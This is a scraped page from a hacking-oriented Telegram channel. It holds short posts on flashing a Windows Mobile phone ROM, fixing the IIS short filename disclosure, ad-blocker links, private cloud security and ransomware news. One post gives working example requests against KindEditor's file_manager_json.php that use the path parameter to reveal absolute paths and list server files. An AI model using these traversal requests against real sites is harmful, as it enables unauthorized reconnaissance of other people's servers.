UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.4K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A must-read course for smartphone novices :

1) Use Smart Phone Studio 1.1 to back up contacts, text messages, call records, etc., download flash-related files (flashing tool, ROM, Radio, formatting ExtROM tool Repart_DOC.exe), and use the latest version 4.0 or higher of the synchronization software ActiveSync.

2) Make sure that the downloaded ROM file (nk.nbf) is correct, and put this file in the directory of the flashing tool (MaUpgradeUt_noID.exe for front page, BaUpgradeUt.exe for headless version).

3) If you are flashing for the first time and format your ExtROM with Repart_DOC.exe before flashing, you can get more storage space. If it is the second time, you don't need it. Choose 128 for the number and click Format.
γ€€
4) Tap and hold the recording + camera + power on buttons at the same time, and then poke RESET with the pen, until the serial port mode appears.
γ€€γ€€
5) Connect the USB cable to synchronize with the computer.
γ€€γ€€
6) Run the flashing tool and click Next. Here you can see the current version of your device and the version of the ROM to be flashed.
γ€€γ€€
(If there is a problem at this step, you can ask people on the Internet about the setting of the RUU.conf file. If the flashing tool you downloaded is relatively complete, this problem will not occur. I want to specifically say because I have seen some flashing tools It is not very complete, it is necessary to use GetDeviceData.exe to generate RUU.conf, which is more troublesome for novices)
γ€€γ€€
7) Some ROMs talk about copying the attached ExtROM directory to the card. In fact, they are all programs that can be installed slowly after flashing the machine, so it doesn't matter whether it is copied or not.
γ€€γ€€
8) Click Upgrade to start upgrading the ROM, first upgrade the Radio, and then upgrade the ROM, the process will take about 5-15 minutes. Of course, if the data cable is disconnected, the machine is shut down, or the power is cut off, everyone knows what will happen, but these are all artificial, just pay attention.
γ€€γ€€
9) After the upgrade is complete (at 100%), click RESET to restart. When the four-color screen just appears (the first screen to start), quickly tap and hold the recording + photo buttons at the same time until an option appears. Use the camera button to jump, the record button to change, the first one is NO, the rest is YES, click the second of the four buttons at the bottom of the screen (the button with an envelope pattern) to confirm.
γ€€γ€€
10) A white screen will appear at this time, about 10 minutes, and then start the system. (If there is a problem in this step, most of the problems are caused by formatting ExtROM, but the probability of the problem is small, and this will not cause your machine to become a brick, just flash back to 2003.) After
γ€€γ€€
booting the system Some software will be installed, just let it go. After installation, it will restart itself. (If there is a problem (stuck stuck) at this step, then write down which software it is, then click RESET, start the machine and install it manually. , No problem)
γ€€γ€€
11) After restarting, use Smart Phone Studio 1.1 to restore your contacts and other data, which can be used in 2003 and WM5.
γ€€γ€€The flashing is completed. If you are proficient, it can be completed within half an hour. Generally, there will be no problems. If the flashing fails, please try to repeat the flashing operation. Many people can get it back without any problems.


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Telegram down xd
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘IIS short file/folder vulnerability repair method :

Turn off NTFS 8.3 file format support. This feature is turned on by default, and it is not necessary for most users.

If you are a virtual host space user, please contact the space provider for repair. Vulnerability description: IIS short file name disclosure vulnerability, file enumeration vulnerability exists in the implementation of IIS, attackers can use this vulnerability to enumerate and obtain files in the root directory of the server.

1) Modify the registry key: (restart the server to take effect)

HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation

The value is 1.

2) Execute the DOS command, fsutil behavior set disable8dot3 1

3) If your web environment does not require asp.net support, you can enter the Internet Information Service (IIS) Manager --- Web Service Extension-ASP.NET to choose to disable this function.

4) Upgrade net framework to version 4.0 or higher.

5) Delete the existing IIS directory and redeploy, and complete this step to completely repair it. (For example, it turned out to be wwwjb51 to create a new directory wwwjb512 and then change it back to wwwjb51.)

Copy the contents of the web folder to another location, such as D:\www to D:\www.back, then delete the original folder D:\www, and then rename D:\www.back to D:\www. If you do not copy again, the existing short file name will not disappear.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST ANDROID WORKING ADD BLOCKERS :

https://f-droid.org/en/packages/org.adaway/

https://adblockplus.org/

https://adguard.com/en/adguard-android/overview.html

https://play.google.com/store/apps/details?id=com.android.chrome

https://block-this.com/

by android authority
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Kindeditor traverse directory 0DAY problem :

KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.

πŸ¦‘Use method:

1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php


2)http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Explanation on the security of private cloud (cloud computing):

1) First of all, the technical foundation of cloud computing is based on an application management program. The hypervisor can isolate computing (and related security threats) from traditional security tools, and check for inappropriate or malicious data packets in network communications.

2) Since the virtual machines in the same server can communicate completely through the communication in the hypervisor, data packets can be sent from one virtual machine to another virtual machine without passing through a physical network. Generally installed security devices check the communication traffic on the physical network.

3) Crucially, this means that if a virtual machine is compromised, it can send dangerous communications to another virtual machine without even being aware of the organization's protective measures. In other words, an insecure application can cause attacks on other virtual machines, and the security measures adopted by the user are powerless.
From this, it is concluded that private clouds are also insecure.

4) I have no opinion on the above-mentioned overall theory, but is it a bit too arbitrary about the result? The above security issues do exist, but we have to see that it is not brought about by private clouds, but by virtualization. As the biggest difference between cloud computing and traditional computing, the problem of virtualization is real and will continue for some time to come.

5) The view of "public cloud is not secure, private cloud is secure" is of course incorrect. We can modify it, "Private cloud is safer than public cloud". On the one hand, the private cloud is deployed within the boundaries of the enterprise’s own data center. Compared with the public cloud, it has a greater guarantee for data security, and it will not cause any damage to the provider due to security issues. It is equivalent to storing our data in our own safe.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Cheap malicious programs kidnap your computer and force you to pay ransom :

The trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything unless you hand it in. ransom

1) With
the development of the times, the trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything.

2) Things, unless you pay a "ransom." The recent popular "ransomware" was first discovered on the abuse.ch website, using the malicious development tool "Blackhole". Moreover, this cheap malicious program can be collected through underground forums and infected systems, and it can easily and conveniently invade the Internet in the form of Adobe Flash Player, Adobe Reader or Java web plug-ins.

3) Once infected, the target system will be locked, and users need to log in to their fake website to pay a "ransom" before they can use your computer normally. It is reported that the "ransomware" has the most severe infections in Australia, France, Germany, the Netherlands, Switzerland and the United Kingdom. For example, in the United Kingdom, users will have to pay Β£50 ($80) after being infected with this malware. However, after unlocking, even though the user has achieved control over the computer, the Aldi Bot variant malware will still be installed, which may become a broiler of DDoS attacks

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁